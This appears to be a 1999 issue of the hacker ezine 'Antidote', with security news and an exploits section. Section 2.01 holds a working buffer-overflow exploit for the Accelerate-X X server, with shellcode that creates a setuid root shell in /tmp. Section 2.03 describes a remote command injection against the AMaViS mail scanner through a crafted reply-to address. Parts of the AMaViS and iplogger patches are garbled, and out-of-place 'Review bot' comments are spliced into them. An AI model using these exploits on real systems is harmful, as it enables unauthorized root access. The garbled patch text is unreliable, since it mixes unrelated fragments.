Volume 2 Issue 12 7/22/99

http://www.thepoison.org/antidote

    bof_ptr = (long *)buffer;
    for (i = 0; i < bufsize - 4; i += 4)
        *(bof_ptr++) = get_sp() - offs;
    printf ("Creating termcap f1le\n");
    printf ("b1tch is Fe3lyn 1t.\n";

------------------------------

In this issue of Antidote, we have over 690 subscribers and are getting more every day! The only thing that we ask of you when you read Antidote is that you go to www.thepoison.org/popup.html and click on our sponsors. One issue of Antidote takes us about a week to put together, and going to our sponsor only takes you about 15 seconds (if that). So please go visit our sponsor, because it is the only thing we ask of you.

-)!-- Contents //--(-

0.00 - Beginning
0.01 - What?
0.02 - FAQ
0.03 - Authors
0.04 - Shouts
0.05 - Writing

1.00 - News
1.01 - Back Orifice targets Windows NT
1.02 - Rhino9 calls it Quits
1.03 - Accreditation program for IT Labs
1.04 - CyberCop: Industry's first 'Decoy'
1.05 - Hackers Unleash Anti-Sniff Tools
1.06 - Getting tough on Virus-Creators
1.07 - cDc Challenges Microsoft in Recall

2.00 - Exploits (new & older)
2.01 - SDIaccelX.c.txt
2.02 - solaris.rpc.cmsd.bof.txt
2.03 - linux.amvis.root.txt
2.04 - iplogger.ymas.txt

3.00 - Misc
Please submit misc. stuff to antidote@thepoison.org!!!

SAY.W - SAY WHAT? Various quotes that might be humorous, stupid, true, or just plain making fun of something or someone.
FEAT.S - FEATURED SITES:
http://browse.thepoison.org
www.thepoison.org/secsource.html
www.403-security.org
www.hackernews.com

------------------------------

**************************************************
 Hosting: http://www.thepoison.org/hosting
 Low affordable pricing starting at $10!
**************************************************

-)!-- 0.00 - Beginning //--(-

0.01 --=\\What?\\=--

What is 'Antidote'? Well, we wouldn't say that Antidote is a hacking magazine, because that would be wrong. We don't claim to be a hacking magazine. All Antidote is, basically, is current news and happenings in the underground world. We aren't going to teach you how to hack or anything, but we will supply you with the current information and exploits. Mainly Antidote is just a magazine for people to read if they have some extra time on their hands and are bored with nothing to do. If you want to read a magazine that teaches you how to hack etc., then you might want to go to your local bookstore and see if they carry '2600'.

------------------------------

0.02 --=\\FAQ\\=--

Here are some questions that we seem to receive a lot, or our "Frequently Asked Questions". Please read this before e-mailing us with questions, and if the question isn't on here or doesn't make sense, then you can e-mail us with your question.

> What exactly is "Antidote"?
See section 0.01 for a complete description.

> I find that Antidote is not aimed at the beginner and does not teach you the basics; why is that?
Antidote is for everyone. All we basically are is a news ezine that comes out once a week with the current news, exploits, flaws and even programming.
All of the articles that are in here are received second hand (sent to us) and we very rarely edit anyone's articles.

> I just found Antidote issues on your webpage. Is there any way I can get them sent to me through e-mail?
Yes. If you go to www.thepoison.org/antidote there should be a text box where you can input your e-mail address. You will receive a link to the current Antidote (where you can view it).

> If I want to submit something, are there any 'rules'?
Please see section 0.03 for a complete description.

> If I submitted something, can I remain anonymous?
Yes. Just make sure that you specify what information about yourself you would like to be published above your article (when sending it to us) and we will do what you say.

> I submitted something and I didn't see it in the current/last issue. Why is that?
It could be that someone else wrote something similar to what you wrote and they sent it to us first. If you sent us something and we didn't e-mail you back, then you might want to send it again, because we probably didn't get it (we respond to all e-mails no matter what). We might use your article in future issues of Antidote.

> Can I submit something that I didn't "discover" or "write"?
Yes you can. We take information that is written by anyone, regardless of whether you wrote it or not.

Well, that's it for our FAQ. If you have a question that is not on here, or the question is on here and you had trouble understanding it, then please feel free to e-mail lordoak@thepoison.org and he will answer your question. This FAQ will probably be updated every month.

------------------------------

0.03 --=\\Authors\\=--

Lord Oak is the founder and current president of Antidote. Most work is done by him. Please feel free to e-mail him at: lordoak@thepoison.org

Duece is the co-founder and co-president of Antidote; some work is done by him when he comes online.
Feel free to e-mail him at: duece@thepoison.org

ox1dation is not really an author, just someone that helps us out a lot, and we consider him an author! His e-mail address is: ox1dation@thepoison.org

------------------------------

0.04 --=\\Shouts\\=--

These are just some shout outs that we feel we owe to some people. Some are individuals and some are groups in general. If you are not on this list and you feel that for some reason you should be, then please contact Lord Oak and he will post you on here, and we are sorry for the misunderstanding. Well, here are the shout outs:

Lord Oak
EazyMoney
Duece
opt1mus
oX1dation
PBBSER
Forlorn
Retribution
0dnek
www.thepoison.org

Like we said above, if we forgot you and/or you think you should be added, please e-mail lordoak@thepoison.org and he will be sure to add you.

------------------------------

0.05 --=\\Writing\\=--

As many of you know, we are always open to articles/submissions. We will take almost anything that has to do with computer security. This leaves you open for:

-Protecting the system (security/securing)
-Attacking the system (hacking, exploits, flaws, etc....)
-UNIX (really anything to do with it...)
-News that has to do with any of the above....

The only thing that we really don't take is webpage hacks, like e-mailing us and saying "www.xxx.com" was hacked... But if you have an opinion about the hacks, that is fine. If you have any questions about what is "acceptable" and not, please feel free to e-mail Lord Oak [lordoak@thepoison.org] with your question and he will answer it.

Also, please note that if we receive two e-mails with the same topic/idea then we will use the one that we received first. So it might be a good idea to e-mail one of us and ask whether someone has already written on this topic, so that you don't waste your time writing something that won't be published. An example of this would be: Joe sends me an e-mail with the topic being hacking hotmail accounts on Thursday.
Then Bill sends us an e-mail on hacking hotmail accounts on Sunday; we will take Joe's article because he sent it in first. But keep in mind, we might use your article for the next issue!

If you have something that you would like to submit to Antidote, please e-mail lordoak@thepoison.org or duece@thepoison.org and one of us will review the article and put it in Antidote (if we like it).

------------------------------

-)!-- 1.00 - News //--(-

1.01 --=\\Back Orifice targets Windows NT\\=--
[www.cnn.com]

(IDG) -- In the consumer world, folks like Ralph Nader fight for consumer rights by helping pass tough consumer protection laws. Then there's the PC world. For us, there's a self-proclaimed equivalent: Groups of (mostly teenaged) hackers basking in the glow of computer monitors, who release nasty computer bugs under the guise of strong-arming software makers to get tough on privacy and security.

"We want to raise awareness to the vulnerabilities that exist within the Windows operating system. We believe the best way to do this is by pointing out its weaknesses," says a member of the hacker group the Cult of the Dead Cow who goes by the pseudonym Sir Dystic.

The Cult of the Dead Cow created and released the program Back Orifice last year to the general public at the Las Vegas hacker and security conference DEF CON. The program allows its users to remotely control victims' desktops, potentially undetected.

Computer security experts question the Cult of the Dead Cow's intent. Releasing a hacking tool like Back Orifice 2000 in the name of safeguarding computer privacy is a bit like the American Medical Association infecting cattle with the deadly e. coli bacteria to inspire food companies to sell healthier meats.

Unlike earlier versions that affected consumers and small businesses, Back Orifice 2000 hits large organizations because it runs on Windows NT systems, which are more used by businesses.
Also, the updated program is modular, so users can add additional functions. For example, they could hide files or activate a computer's microphone for real-time audio monitoring, according to Cult of the Dead Cow.

Back Orifice 2000 will also be more difficult to detect via network monitoring programs, according to Sir Dystic. This is because the program can communicate back to the sender by using a variety of different protocols, making it hard to identify.

The group also says it will make the source code available for Back Orifice 2000, which will likely spawn multiple strains of the program in the hacker community, experts say.

Another purported function is real-time keystroke-logging, which can record and transmit a record of every keystroke of an infected computer. Also, the recipient can view the desktop of a targeted computer in real time.

It should be noted that PC World Online has no independent confirmation that the new Back Orifice 2000 program actually lives up to the claims of Cult of the Dead Cow.

http://cnn.com/TECH/computing/9907/07/nthack.idg/index.html

------------------------------

1.02 --=\\Rhino9 calls it Quits\\=--

3 members of Rhino9 have moved to a far off place to accept a position at a security company with a good future. The rest of Rhino9 just didn't seem to want to continue on without the other 3 members. We have enjoyed everything we have done as a team and hope that we have been able to provide the community with some valuable resources.

We want to thank everyone that's supported us over the years. A special thanks to Ken Williams of PacketStorm for excellent coverage of everything we did. Sorry to hear of your misfortune bro... JP is an ass. Thanks to L0pht for advice and tidbits of help over the years.

Rhino9 has seen some rough times and some members come and go... but everyone seems to be doing well. To the community at large, thanks for everything, and I'm sure this won't be the last you see of R9's members.
Although the team is officially disbanding, its members are still very active.

Thanks Again,
-The Rhino9 Security Research Team

------------------------------

1.03 --=\\Accreditation program for IT Labs\\=--
[www.fcw.com]

The National Institute of Standards and Technology today announced the creation of an accreditation program for laboratories that test commercial information technology security products for compliance with federal and international standards.

The National Voluntary Laboratory Accreditation Program will evaluate laboratories for their accordance with the National Information Assurance Partnership's Common Criteria Evaluation and Validation Scheme. NIST and the National Security Agency created the NIAP and the common criteria scheme to make it easier for federal agencies to choose commercial IT security products that meet certain standards.

The NIAP Validation Body will review the test reports from the labs and issue certificates for the products. NIST will periodically assess the labs for reaccreditation.

NIAP also is working toward a Common Criteria Mutual Recognition Agreement with similar organizations in five other countries to set a wider-reaching common standard for security products.

http://www.fcw.com/pubs/fcw/1999/0712/web-nist-7-12-99.html

------------------------------

1.04 --=\\CyberCop: Industry's first 'Decoy'\\=--
[www.yahoo.com]

Network Associates today announced the immediate availability of its CyberCop Sting software, a new ``decoy'' server that silently traces and tracks hackers, recording and reporting all intrusive activity to security administrators. CyberCop Sting, an industry first, is an integral component of the CyberCop intrusion protection software family, which also includes CyberCop Monitor, a real-time intrusion detection application that monitors critical systems and networks for signs of attack (see related release), and CyberCop Scanner, the industry's most highly-rated network vulnerability scanner.
CyberCop Sting addresses the most unfulfilled need in intrusion protection products today by allowing IS managers to silently monitor suspicious activity on their corporate network and identify potential problems before any real data is jeopardized.

CyberCop Sting operates by creating a series of fictitious corporate systems on a specially outfitted server that combines moderate security protection with sophisticated monitoring technology. The Sting product creates a decoy, virtual TCP/IP network on a single server or workstation and can simulate a network containing several different types of network devices, including Windows NT servers, Unix servers and routers. Each virtual network device has a real IP address and can receive and send genuine-looking packets from and to the larger network environment. Each virtual network node can also run simulated daemons, such as finger and FTP, to further emulate the activity of a genuine system and avoid suspicion by would-be intruders. While watching all traffic destined to hosts in its virtual network, Sting performs IP fragmentation reassembly and TCP stream reassembly on the packets destined to these hosts, convincing snoopers of the legitimacy of the secret network they've discovered.

``More than 60 percent of all security breaches are caused by authorized employees or contractors already inside the firewall,'' said Wes Wasson, director of product marketing for Network Associates. ``CyberCop Sting gives security administrators, for the first time ever, a safe way to observe and audit potentially dangerous activity on their networks before it becomes a problem.''

CyberCop Sting provides a number of benefits for security administrators, including:

* Detection of suspicious activity inside the network; log files serve to alert administrators to potential attackers prying into reserved areas.
* Ability to record suspicious activity without sacrificing any real systems or protected information.
* Virtual decoy network can contain multiple "hosts" without the expense and maintenance that real systems require.
* CyberCop Sting software's virtual hosts return realistic packet information.
* CyberCop Sting logs snooper activity immediately, so collection of information about potential attackers can occur before they leave.
* CyberCop Sting requires very little file space but creates a sophisticated virtual network.

Network Associates' CyberCop Intrusion Protection suite is a collection of integrated security tools developed to provide network risk assessment scanning (Scanner), real-time intrusion monitoring (Monitor) and decoy trace-and-track capabilities (Sting) to enhance the security and survivability of enterprise networks and systems. The suite is also enhanced by the development of technology and research derived from Network Associates' extensive product line, and includes industry-first features such as AutoUpdate, modular construction, and Active Security integration to provide extensive product integrity. A Network Associates white paper on next-generation intrusion detection is available at http://www.nai.com/activesecurity/files/ids.doc.

Pricing and availability

CyberCop Sting is free with the purchase of CyberCop Monitor, Network Associates' new real-time intrusion detection software. Sting is also available as part of the full CyberCop suite, which also includes CyberCop Scanner, CyberCop Monitor and the CASL Custom Scripting Toolkit. The CyberCop Intrusion Protection suite is priced at $17 per seat for a 1,000 user license.

With headquarters in Santa Clara, Calif., Network Associates, Inc. is a leading supplier of enterprise network security and management software. Network Associates' Net Tools Secure and Net Tools Manager offer best-of-breed, suite-based network security and management solutions.
Net Tools Secure and Net Tools Manager suites combine to create Net Tools, which centralizes these point solutions within an easy-to-use, integrated systems management environment. For more information, Network Associates can be reached at 408-988-3832 or on the Internet at http://www.nai.com .

NOTE: Network Associates, CyberCop, and Net Tools are registered trademarks of Network Associates and/or its affiliates in the United States and/or other countries. All other registered and unregistered trademarks in this document are the sole property of their respective owners.

http://biz.yahoo.com/prnews/990714/ca_ntwrk_a_1.html

------------------------------

1.05 --=\\Hackers Unleash Anti-Sniff Tools\\=--
[www.nytimes.com]

A Boston-based hacker think tank on Friday will unveil software that can detect whether or not Sniffer-type analyzers are being used to probe enterprise networks. L0pht Heavy Industries will introduce AntiSniff 1.0 at DefCon, an annual hackers' convention.

A typical way for hackers -- both black-hat and ethical -- to gain access to an organization's network is to use analyzers that can sniff or probe for passwords for networked systems. While many scanning tools can probe networks to expose potential vulnerabilities, they don't give IT managers a clear sense of whether or not systems have been compromised or broken into, said L0pht's chief scientist, who goes by the name Mudge.

AntiSniff is designed to help IT managers be more proactive in thwarting security threats, Mudge told a gathering of security managers and experts today at The Black Hat Briefings.

"Don't play reactive," Mudge said. "There are new ways to look for [new attack] patterns."

L0pht said it plans to release all technical details for AntiSniff to the public. But the monitoring software carries a double-edged sword.
While it can be used by "good guys" to thwart network intruders, it can also be used by the "bad guys" to sniff out a company's network intrusion systems, Mudge said.

http://www.nytimes.com/techweb/TW_Hacker_Think_Tank_To_Unleash_Anti_Sniff_Tools.html

------------------------------

1.06 --=\\Getting tough on Virus-Creators\\=--
[www.edmontonjournal.com]

Ottawa has to get tougher with hackers who send file-destroying computer viruses over the Internet, the industry association representing Canada's computer industry said Thursday.

The mischievous makers who devise programs that destroy corporate computer files and cause entire high-tech systems to collapse are getting away with a slap on the wrist for a crime that is costing the Canadian economy millions annually, said Andre Gauthier, chair of the Information Technology Association of Canada and senior vice-president of LGS Group Inc.

"Too many people consider these things as funny. But sending a virus is just like launching a terrorist attack on a company," Gauthier said.

ITAC, which represents 1,300 Canadian software and hardware companies, sent a letter Thursday to federal Justice Minister Anne McLellan asking her to increase the penalties for this kind of crime and to work more closely with other law enforcement agencies globally to track down virus makers.

Over the past several months, the Chernobyl, Melissa and Worm-Explore.Zip viruses made headlines internationally as they attacked the computer systems of corporations and government agencies in many countries.

Viruses are programs that enter a computer system through the e-mail or other external links and then cause havoc in the network, everything from exploding fireworks on a person's computer screen to the elimination of stored files on the system's hard drive.

In many cases, these hackers are people who enjoy the intellectual challenge of writing.
In other situations, they are only after the publicity these viruses can receive, causing people to treat these crimes as less dangerous.

"But (in the information age), a crime no longer requires a .45-calibre Magnum. We have to deal with these things in a far more serious manner. They do a lot of damage," said Robert Lendvai, vice-president of marketing at OLAP@Home Inc., an Ottawa-based software programmer.

For instance, one Ottawa public relations firm had to close its doors for one day to repair the damage from the Melissa virus, he said.

ITAC's Gauthier figured Canadian corporations and governments lose $100 million annually because of these computer bugs. That figure was extrapolated from the $1-billion US loss estimated to American corporations derived from an earlier U.S. study.

Companies are getting help in the form of more sophisticated virus detection programs, now "a basic protection" for any smart firm, said David Lynch, vice-president of sales and marketing of KyberPASS Corp., an Ottawa-based electronic commerce software maker.

These detection programs generally work by looking for indicators within a corporate computer system that change for an unexplained reason. In that case, the program will send a warning that you may have a problem.

"But viruses are always going to be with us," he said.

KyberPASS was hit by three viruses in the past year, two of which entered the system through the company's e-mail and one when someone in the corporation downloaded an outside file, Lynch said.

"It's computer vandalism. Some of it is paint on the walls. And some is like throwing eggs at the door," he said.

http://www.edmontonjournal.com/technology/stories/990716/2615262.html

------------------------------

1.07 --=\\cDc Challenges Microsoft in Recall\\=--
[www.cultdeadcow.com]

The CULT OF THE DEAD COW (cDc) publicly challenges Microsoft Corporation to voluntarily recall all copies of its Systems Management Server network software.
In addition, cDc calls for the antivirus industry to respond with signature scanning for SMS files.

"Hypocrisy" is such an ugly word. So instead, why don't we just chalk this one up to Do-What-We-Say-Not-What-We-Do?

Microsoft evidently dislikes our new tool so much that they've taken to complaining about one of its key features. We're talking about Back Orifice 2000, and the feature in question is its stealth mode.

Microsoft has claimed that BO2K is a malicious tool with no legitimate use. Their primary evidence is BO2K's stealth feature, which gives you the option to run the server on the remote machine without it being evident to anybody sitting at that machine. In fact, here's what they're saying right now on the Microsoft Security Advisor website:

    BO2K is a program that, when installed on a Windows computer, allows the computer to be remotely controlled by another user. Remote control software is not malicious in and of itself; in fact, legitimate remote control software packages are available for use by system administrators. What is different about BO2K is that it is intended to be used for malicious purposes, and includes stealth behavior that has no purpose other than to make it difficult to detect.

Now, we concede that on its face, this sounds like a valid criticism. Being able to operate a remote admin tool without the person at the other end knowing that it's running on the machine seems downright devious. (Keep in mind that BO2K's stealth feature is an OPTION, which is in fact disabled by default.)

Maybe Microsoft is right; perhaps this stealth feature in and of itself is enough to brand it a hacker tool with no redeeming social value. But then, what are we to make of Systems Management Server (SMS)? SMS is Microsoft's remote admin tool for Windows. As it happens, SMS has a nearly identical stealth feature.
As a matter of fact, they explain this feature in a Word document available from the Microsoft website:

    Security

    Of all the operations that Systems Management Server allows you to do on a client, remote control is possibly the most "dangerous" in terms of security. Once an administrator is remote controlling a client, he has as many rights and access to that machine as if he were sitting at it. Added to this, there is also the possibility of carrying out a remote control session without the user at the client being aware of it. Thus, it is important to understand the different security options available and also to understand the legal implications of using some of them in certain jurisdictions."

    Visible and Audible Indicators

    It is possible to configure a remote control from a state where there is never any visible or audible indication that a remote control session is under way. It has been made this flexible due to customer demands ranging from one end of this spectrum to the other. When configuring the options available in the Remote Tools Client Agent properties, due notice must also be taken of company policy and local laws about what level of unannounced and unacknowledged intrusion is permitted."

Notice that? Microsoft's own tool has the same evil capability as BO2K.

Now, Microsoft did not invent surreptitious desktop surveillance; there are other products on the market that perform these functions. Microsoft is just the largest supplier of the technology, as SMS comes bundled with each copy of Back Office.

Why is it that Microsoft can offer a tool having this illegitimate functionality without any moral qualms, but when WE do it, they throw a hissy fit? Well... we have a hunch.

"Microsoft wants to keep everybody talking about the evil software from us crazy computer hackers. So they paint BO2K as a dangerous application with no constructive uses," says Reid Fleming (cDc). "We beg to differ."
BO2K doesn't exploit any bugs in the Windows operating system that Microsoft is willing to categorize as such. So in order to convince the public that BO2K is a solely destructive tool, Microsoft is forced to criticize the tool's feature set. Evidently whoever dreamed up this press strategy was unaware of Systems Management Server and its stealth feature.

Of course, there's another possibility. Microsoft sells SMS for cash money. Meanwhile, BO2K is free. (It's also open source, and better constructed any way you measure it: size, efficiency, functionality, security.) Maybe this is just another example of Microsoft's alleged anticompetitiveness?

"BO2K, like SMS, is a powerful software tool. Like any powerful tool, it can be used either responsibly or irresponsibly," says Count Zero (cDc). "For Microsoft to claim that BO2K has no legitimate purpose is ridiculous. Their own SMS tool has nearly the same functionality as BO2K, and Microsoft is happy to let you pay $1,000+ for it."

Regardless of their motivations, Microsoft is selling software which does many of the same things as Back Orifice 2000, including the pernicious ability to run hidden from the user. And if stealth mode is what makes BO2K a malicious program, then Microsoft's Systems Management Server is a malicious program too.

Consequently, we challenge Microsoft to recall all copies of the SMS administration tool, because its featureset contains stealth capability. This feature clearly illustrates that their software has no legitimate use. Furthermore, we urge all antivirus vendors to include signatures for SMS in their scanner utilities.

Back Orifice 2000 is available for download free of charge from .
http://www.cultdeadcow.com/news/pr19990719.html

------------------------------

-)!-- 2.00 - Exploits //--(-

2.01 --=\\SDIaccelX.c.txt\\=--

/*
 * SDI linux exploit for Accelerate-X
 * Sekure SDI - Brazilian Information Security Team
 * by c0nd0r
 *
 * This script will exploit a vulnerability found by KSRT team
 * in the Accelerate-X Xserver [<=5.0].
 *
 * --------------------------------------------------------------------
 * The vulnerable buffer was small so we've changed the usual order to:
 * [garbage][eip][lots nop][shellcode]
 * BTW, I've also changed the code to execute, it will create a setuid
 * shell owned by the superuser at /tmp/sh.
 * --------------------------------------------------------------------
 *
 * Warning: DO NOT USE THIS TOOL FOR ILICIT ACTIVITIES! We take no
 * responsability.
 *
 * Greets to jamez, bishop, bahamas, stderr, dumped, paranoia,
 * marty (NORDO!), vader, fcon, slide, c_orb and
 * specially to my sasazita. Also toxyn.org, pulhas.org,
 * superbofh.org (Phibernet rox) and el8.org.
 *
 * Laughs - lame guys who hacked the senado/planalto.gov.br
 * pay some attention to the site: securityfocus.com (good point).
 * see you at #uground (irc.brasnet.org)
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* generic shellcode */
char shellcode[] =
    "\xeb\x31\x5e\x89\x76\x32\x8d\x5e\x08\x89\x5e\x36"
    "\x8d\x5e\x0b\x89\x5e\x3a\x31\xc0\x88\x46\x07\x88"
    "\x46\x0a\x88\x46\x31\x89\x46\x3e\xb0\x0b\x89\xf3"
    "\x8d\x4e\x32\x8d\x56\x3e\xcd\x80\x31\xdb\x89\xd8"
    "\x40\xcd\x80\xe8\xca\xff\xff\xff"
    "/bin/sh -c cp /bin/sh /tmp/sh; chmod 6755 /tmp/sh";

int main(int argc, char *argv[])
{
    char buf[1024];
    int x, y, offset = 1000;
    long addr;
    int joe;

    if (argc > 1)
        offset = atoi(argv[1]);

    /* return address: an address on this stack plus the chosen offset */
    addr = (long) &joe + offset;

    buf[0] = ':';                       /* argument starts like an X display name */
    for (x = 1; x < 53; x++)            /* filler up to the saved return address */
        buf[x] = 'X';
    buf[x++] = (addr & 0x000000ff);      /* return address, little-endian */
    buf[x++] = (addr & 0x0000ff00) >> 8;
    buf[x++] = (addr & 0x00ff0000) >> 16;
    buf[x++] = (addr & 0xff000000) >> 24;
    for (; x < 500; x++)                /* nop sled */
        buf[x] = 0x90;
    for (y = 0; y < strlen(shellcode); y++, x++)
        buf[x] = shellcode[y];
    buf[x] = '\0';                      /* terminate here; the original called strlen() on the unterminated buffer */

    fprintf(stderr, "\nSDI Xaccel - Offset: %d | Addr: 0x%lx\n\n", offset, addr);

    execl("/usr/X11R6/bin/Xaccel", "Xaccel", buf, (char *)0);
    /* setenv("EGG", buf, 1); */
    /* system("/bin/sh"); */
    return 0;
}

------------------------------

2.02 --=\\solaris.rpc.cmsd.bof.txt\\=--

Subject: Re: Exploit of rpc.cmsd
Date: Sat Jul 10 1999 00:43:08
Author: Andy Polyakov

Bob!

> The calendar manager (rpc.cmsd) on Solaris 2.5 and 2.5.1 is vulnerable
> to a buffer overflow attack...
> ... we have seen the intruder delete administrator logs, change
> homepages, and insert backdoors. The attack signature is similar to
> the tooltalk attack.

Can you confirm that compromised system(s) were equipped with CDE? Or in other words, was it /usr/dt/bin/rpc.cmsd that was assigned to do the job in /etc/inetd.conf?

> Further, it appears that even patched versions may be vulnerable.

Could you be more specific here and tell exactly which patches you are talking about?

> Also, rpc.cmsd under Solaris 2.6 could also be problematic.
I want to point out that there is a rather fresh 105566-07 for Solaris 2.6 which claims "4230754 Possible buffer overflows in rpc.cmsd" fixed. There is a rather old 103670-03 for Solaris 2.5[.1] which claims "1264389 rpc.cmsd security problem." fixed. Then there is 104976-03 claiming "1265008 : Solaris 2.x rpc.cmsd vulnerabity" fixed. Are these the ones you refer to as "patched versions" and "could be problematic"?

Andy.

------------------------------

2.03 --=\\linux.amvis.root.txt\\=--

Subject: AMaViS virus scanner for Linux - root exploit
Date: Fri Jul 16 1999 16:00:43
Author: Chris McDonough

The AMaViS incoming-mail virus scanning utility (available at http://satan.oih.rwth-aachen.de/AMaViS/) for Linux has problems.

I tried to contact the maintainer of the package (Christian Bricart) on June 26, and again several times over the course of the last month, but I have not received anything from him and the AMaViS website does not yet acknowledge the problem or provide a fix. However, on Jun 30, co-contributors to the package (Juergen Quade and Mogens Kjaer) responded quickly with an acknowledgement of the problem and a few fixes. Because the co-authors do not maintain the downloadable package, however, the latest downloadable version of AMaViS (0.2.0-pre4 and possibly earlier) still has a bug which allows remote users to send arbitrary commands as root to a Linux machine running the AMaViS scripts.

Exploit:

Send a message with a virus-infected file attachment. Use something like "`/sbin/reboot`@dummy.com " as your reply-to address in your MUA when sending the message. When the AMaViS box receives the message, it will go through its scripts, find the virus, and construct an email message to send back to the sender of the virus-infected file... line 601+ in the "scanmails" script:

cat <
# +# or # +# $(/sbin/reboot) @softing.com # +# The execution of the command (/sbin/reboot) is done by the # +# "mail" program.
Therefore we parse the arguments in order # +# to substitute those characters to nothing # + # # +# Wed Jun 30 11:47:55 MEST 1999 # + ############################################################ ### + +# substitute all "`","$(",")" to nothing +receiver=${7//\`/} +receiver=${receiver//\$\(/} +receiver=${receiver//\)/} + +sender=${2//\`/} +sender=${sender//\$\(/} +sender=${sender//\)/} + +if [ "$sender" != "$2" -o "$receiver" != "$7" ] ; then + cat < # +# or # +# \$\(/sbin/rebbot\) @softing.com # +# The execution of the command (/sbin/rebbot) is done by the # +# "mail" program. Therefore we parse the arguments in order # +# to substitute those characters to nothing # + # # +# Wed Jun 30 11:47:55 MEST 1999 # + ############################################################ ### + $7 or $2 is not a valid Email address + (changed to $receiver and $sender)! +EOF +fi +# + ################################################ # main program # # -------------- # @@ -171,8 +215,8 @@ echo xxxxxxxxxxxxxxxxxx`date`xxxxxxxxxxxxxxxxxxxxxxx > ${tmpdir}/logfile echo ${scanscriptname} called $* >>${tmpdir}/logfile -echo FROM: $2 >>/${tmpdir}/logfile -echo TO: $7 >>/${tmpdir}/logfile +echo FROM: $sender >>/${tmpdir}/logfile +echo TO: $receiver >>/${tmpdir}/logfile ${metamail} -r -q -x -w ${tmpdir}/receivedmail > /dev/null 2>&1 
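Review bot: in the added block at the top of the scanmails patch, the sanitiser only deletes "`", "$(" and ")" from $2 and $7 and then continues with the rewritten address; a deny-list strip is brittle because any metacharacter not on the list still reaches the "mail" program, so prefer an allow-list check that refuses to send the notification at all when the address contains anything outside the permitted set, for example `case "$7" in *[!A-Za-z0-9._@+-]*) exit 1 ;; esac`, instead of cleaning and carrying on. The warning text in that same block also spells the example command "/sbin/rebbot".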
@@ -597,11 +641,11 @@ ################### send a mail back to sender ###################### -cat <

------------------------------

2.04 --=\\iplogger.ymas.txt\\=--

Re, tcplog is part of iplogger-1.2. From tcplog.c:

#ifdef DETECT_BOGUS
  /* Nmap and Queso use a bogus tcp flag to "fingerprint" OS'es.. */
  if ((hdr.tcp.th_flags & TH_BOG) && last_bogus != hdr.ip.ip_src.s_addr) {
    last_bogus = hdr.ip.ip_src.s_addr;
    syslog(LEVEL, "bogus tcp flags set by %s (%s)",
           hostlookup(hdr.ip.ip_src.s_addr, (syncount != SYN_FLOOD)),
           inet_ntoa(hdr.ip.ip_src));
  }
#endif

But this isn't enough. The Ymas (0x80) bogus flag must be logged. Try
hping -Y to test if your port scanning detector has the same problem.
Problem noticed with ntf >. Here is the patch (but I think it's better to
rewrite):

--- tcplog.c Mon Jul 19 05:32:58 1999 +++ tcplog-new.c Mon Jul 19 05:46:48 1999 @@ -59,6 +59,7 @@ #ifdef DETECT_BOGUS # define TH_BOGUS 0x40 +# define TH_OTHER_BOG 0x80 # define TH_BOG TH_BOGUS #endif
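Review bot: in the `@@ -59,6 +59,7 @@` hunk, adding TH_OTHER_BOG as a separate macro while leaving `# define TH_BOG TH_BOGUS` unchanged forces every caller to test two flags (which is exactly what the second hunk then does); defining the mask once as `# define TH_BOG (TH_BOGUS | TH_OTHER_BOG)` lets the existing `hdr.tcp.th_flags & TH_BOG` test cover both reserved bits without touching the condition, and keeps the two names consistent (TH_BOGUS versus TH_OTHER_BOG).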
@@ -133,7 +134,7 @@ #ifdef DETECT_BOGUS /* Nmap and Queso use a bogus tcp flag to "fingerprint" OS'es.. */ - if ((hdr.tcp.th_flags & TH_BOG) && last_bogus != hdr.ip.ip_src.s_addr) { + if ((((hdr.tcp.th_flags & TH_BOG) || (hdr.tcp.th_flags & TH_OTHER_BOG))) && last_bogus != hdr.ip.ip_src.s_addr) { last_bogus = hdr.ip.ip_src.s_addr; syslog(LEVEL, "bogus tcp flags set by %s (%s)", hostlookup(hdr.ip.ip_src.s_addr, (syncount != SYN_FLOOD)), inet_ntoa(hdr.ip.ip_src)); }

antirez

------------------------------

-)!-- 3.00 - Misc //--(-

We have no misc things, please submit them.

We have been working hard on Security Source/Embryonic Project. If you go to
our site (www.thepoison.org), you will notice a new layout not dedicated to
hacking but dedicated to computer security. Security Source/Embryonic Project
has over 4,000 programs, exploits, tutorials and other misc things for you to
view and download. Most of these files are located at our new subdomain
because we don't have the time to upload and make "fancy" webpages for all of
the content, so our new subdomain is basic/typical HTML. It can be located at:

http://browse.thepoison.org

------------------------------

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Quote #6-

*JP stands up*
"Hi, my name is JP and I am addicted to lying."
*Everyone claps and JP sits down*
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Antidote is an HNN Affiliate
http://www.hackernews.com

All ASCII art in this issue is done by Lord Oak [lordoak@thepoison.prg] and
permission is needed before using.